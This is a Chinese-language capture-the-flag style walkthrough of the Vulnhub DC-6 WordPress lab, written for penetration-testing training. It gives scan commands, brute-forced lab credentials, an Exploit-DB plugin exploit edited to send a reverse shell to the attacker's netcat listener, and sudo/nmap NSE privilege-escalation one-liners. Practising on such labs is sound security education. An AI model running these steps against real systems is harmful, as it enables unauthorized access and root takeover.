OSCP渗透靶场之Vulnhub-DC6
字数 1327 2025-08-10 23:41:58
Vulnhub-DC6 渗透测试实战教学文档
靶机概述
Vulnhub-DC6 是一个基于 WordPress 的渗透测试靶机,涉及多种渗透技术,包括:
- WordPress 密码爆破
- WPScan 扫描工具利用
- WordPress 插件漏洞利用
- 文件上传绕过系统登录
- Nmap 自定义脚本提权
环境准备
- 下载靶机:https://www.vulnhub.com/entry/dc-6,315/
- 使用 VMware 打开靶机
- 确保攻击机与靶机在同一网络
信息收集
1. Nmap 扫描
nmap -sC -sV -p- -v -A 192.168.56.101
扫描结果:
- 22/tcp: OpenSSH 7.4p1 Debian 10+deb9u6
- 80/tcp: Apache httpd 2.4.25 (Debian)
- WordPress 5.1.1
- 41243/tcp: tcpwrapped
2. 主机名绑定
编辑 /etc/hosts 文件:
192.168.56.101 wordy
3. WPScan 扫描
wpscan --url http://wordy --enumerate
扫描发现两个有漏洞的插件:
- user-role-editor - 存在 WordPress 账号提权漏洞
- plainview-activity-monitor - 存在 RCE 漏洞
漏洞利用
1. WordPress 密码爆破
靶机提示:使用密码字典爆破 WordPress 账号
成功爆破出账号:
- 用户名:mark
- 密码:helpdesk01
2. 利用 plainview-activity-monitor 插件漏洞
- 在 Exploit-DB 搜索该插件漏洞(编号:45274)
- 下载 exp 文件(45274.html)
- 修改 exp 文件:
http://localhost:8000→http://wordy127.0.0.1→ 攻击机 IP(如 192.168.56.102)- 移除 nc 的
-lvnp参数
- 在攻击机开启监听:
nc -lvnp 9999 - 浏览器打开修改后的 45274.html,点击 "submit request"
- 成功获取反弹 shell
权限提升
1. 获取 graham 用户权限
- 在反弹的 shell 中查找 SSH 凭证
- 发现 graham 用户的密码
- 通过 SSH 登录:
ssh 192.168.56.101 -l graham
2. 获取 jens 用户权限
-
检查 graham 的 sudo 权限:
sudo -l输出:
User graham may run the following commands on dc-6: (jens) NOPASSWD: /home/jens/backups.sh -
检查
/home/jens/backups.sh文件权限:- graham 和 www-data 用户都有写权限
-
修改 backups.sh 文件:
echo "/bin/bash" > /home/jens/backups.sh -
执行脚本获取 jens 权限:
sudo -u jens /home/jens/backups.sh
3. 获取 root 权限
-
检查 jens 的 sudo 权限:
sudo -l输出:
User jens may run the following commands on dc-6: (root) NOPASSWD: /usr/bin/nmap -
创建 nmap 提权脚本:
echo 'os.execute("/bin/bash")' > /tmp/shell.nse -
使用 nmap 执行脚本提权:
sudo /usr/bin/nmap --script=/tmp/shell.nse成功获取 root 权限
总结
本靶场涉及的关键技术点:
- 信息收集:Nmap 扫描、WPScan 扫描
- 漏洞利用:WordPress 密码爆破、插件漏洞利用
- 权限提升:
- 利用 sudo 权限执行脚本
- 利用 nmap 的交互模式提权
学习要点:
- WordPress 安全审计方法
- 插件漏洞的识别与利用
- Linux 权限提升技巧
- 自动化工具与手动渗透的结合
建议进一步练习 Vulnhub 的 DC 系列其他靶机以巩固技能。